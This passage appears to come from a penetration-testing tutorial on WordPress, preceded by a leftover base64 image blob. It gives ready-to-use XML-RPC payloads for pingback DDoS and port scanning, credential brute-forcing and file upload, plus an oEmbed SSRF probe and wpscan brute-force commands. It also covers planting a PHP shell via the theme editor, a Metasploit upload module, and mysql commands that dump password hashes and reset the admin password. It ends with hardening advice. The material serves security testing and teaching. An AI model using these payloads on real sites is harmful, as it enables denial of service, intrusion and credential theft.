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)
|
|
|
|
#### DDoS or port scanning
|
|
|
|
If you can find the method _**pingback.ping**_ inside the list you can make the Wordpress send an arbitrary request to any host/port.
|
|
This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** \(so a **DDoS** is caused in that location\) or you can use it to make **Wordpress** lo **scan** some internal **network** \(you can indicate any port\).
|
|
|
|
```markup
|
|
<methodCall>
|
|
<methodName>pingback.ping</methodName>
|
|
<params><param>
|
|
<value><string>http://<YOUR SERVER >:<port></string></value>
|
|
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
|
|
</value></param></params>
|
|
</methodCall>
|
|
```
|
|
|
|
![](../../.gitbook/assets/1_jauyizf8zjdggb7ocszc-g.png)
|
|
|
|
If you get **faultCode** with ****a value **greater** then **0** \(17\), it means the port is open.
|
|
|
|
Take a look to the use of **`system.multicall`**in the previous section to learn how to abuse this method to cause DDoS.
|
|
|
|
### wp-cron.php DoS
|
|
|
|
This file usually exists under the root of the Wordpress site: `/wp-cron.php`
|
|
When this file is **accessed** a "**heavy**" MySQL **query** is performed, so I could be used by **attackers** to **cause** a **DoS**.
|
|
Also, by default, the `wp-cron.php` is called on every page load \(anytime a client requests any Wordpress page\), which on high-traffic sites can cause problems \(DoS\).
|
|
|
|
It is recommended to disable Wp-Cron and create a real cronjob inside the host that perform the needed actions in a regular interval \(without causing issues\).
|
|
|
|
#### **Bruteforce**
|
|
|
|
```markup
|
|
<methodCall>
|
|
<methodName>wp.getUsersBlogs</methodName>
|
|
<params>
|
|
<param><value>username</value></param>
|
|
<param><value>password</value></param>
|
|
</params>
|
|
</methodCall>
|
|
```
|
|
|
|
![](../../.gitbook/assets/image%20%28107%29%20%282%29.png)
|
|
|
|
![](../../.gitbook/assets/image%20%28224%29.png)
|
|
|
|
Using the correct credentials you can upload a file. In the response the path will appears \([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982)\)
|
|
|
|
```markup
|
|
<?xml version='1.0' encoding='utf-8'?>
|
|
<methodCall>
|
|
<methodName>wp.uploadFile</methodName>
|
|
<params>
|
|
<param><value><string>1</string></value></param>
|
|
<param><value><string>username</string></value></param>
|
|
<param><value><string>password</string></value></param>
|
|
<param>
|
|
<value>
|
|
<struct>
|
|
<member>
|
|
<name>name</name>
|
|
<value><string>filename.jpg</string></value>
|
|
</member>
|
|
<member>
|
|
<name>type</name>
|
|
<value><string>mime/type</string></value>
|
|
</member>
|
|
<member>
|
|
<name>bits</name>
|
|
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
|
|
</member>
|
|
</struct>
|
|
</value>
|
|
</param>
|
|
</params>
|
|
</methodCall>
|
|
```
|
|
|
|
#### DDOS
|
|
|
|
```markup
|
|
<methodCall>
|
|
<methodName>pingback.ping</methodName>
|
|
<params>
|
|
<param><value><string>http://target/</string></value></param>
|
|
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
|
|
</params>
|
|
</methodCall>
|
|
```
|
|
|
|
![](../../.gitbook/assets/image%20%28203%29.png)
|
|
|
|
### /wp-json/oembed/1.0/proxy - SSRF
|
|
|
|
Try to access _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ and the Worpress site may make a request to you.
|
|
|
|
This is the response when it doesn't work:
|
|
|
|
![](../../.gitbook/assets/image%20%28127%29.png)
|
|
|
|
### SSRF
|
|
|
|
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
|
|
|
|
This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them.
|
|
|
|
### Automatic Tools
|
|
|
|
```bash
|
|
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
|
|
wpscan --rua --enumerate --url http://www.domain.com --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
|
|
#You can try to bruteforce the admin user using wpscan with "-U admin"
|
|
```
|
|
|
|
## **Panel RCE**
|
|
|
|
#### **Modifying a php from the theme used \(admin credentials needed\)**
|
|
|
|
Appearance → Editor → 404 Template \(at the right\)
|
|
|
|
Change the content for a php shell:
|
|
|
|
![](../../.gitbook/assets/image%20%28125%29.png)
|
|
|
|
Search in internet how can you access that updated page. In thi case you have to access here: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
|
|
|
### MSF
|
|
|
|
You can use:
|
|
|
|
```text
|
|
use exploit/unix/webapp/wp_admin_shell_upload
|
|
```
|
|
|
|
to get a session.
|
|
|
|
## Post Exploitation
|
|
|
|
Extract usernames and passwords:
|
|
|
|
```bash
|
|
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
|
|
```
|
|
|
|
Change admin password:
|
|
|
|
```bash
|
|
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
|
|
```
|
|
|
|
## WordPress Protection
|
|
|
|
### Regular Updates
|
|
|
|
Make sure WordPress, plugins, and themes are up to date. Also confirm that automated updating is enabled in wp-config.php:
|
|
|
|
```bash
|
|
define( 'WP_AUTO_UPDATE_CORE', true );
|
|
add_filter( 'auto_update_plugin', '__return_true' );
|
|
add_filter( 'auto_update_theme', '__return_true' );
|
|
```
|
|
|
|
Also, **only install trustable WordPress plugins and themes**.
|
|
|
|
### Security Plugins
|
|
|
|
* \*\*\*\*[**Wordfence Security**](https://wordpress.org/plugins/wordfence/)\*\*\*\*
|
|
* \*\*\*\*[**Sucuri Security**](https://wordpress.org/plugins/sucuri-scanner/)\*\*\*\*
|
|
* \*\*\*\*[**iThemes Security**](https://wordpress.org/plugins/better-wp-security/)\*\*\*\*
|
|
|
|
### **Other Recommendations**
|
|
|
|
* Remove default **admin** user
|
|
* Use **strong passwords** and **2FA**
|
|
* Periodically **review** users **permissions**
|
|
* **Limit login attempts** to prevent Brute Force attacks
|
|
* Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
|
|
|
|
|
|
|
|
## \*\*\*\*
|
|
|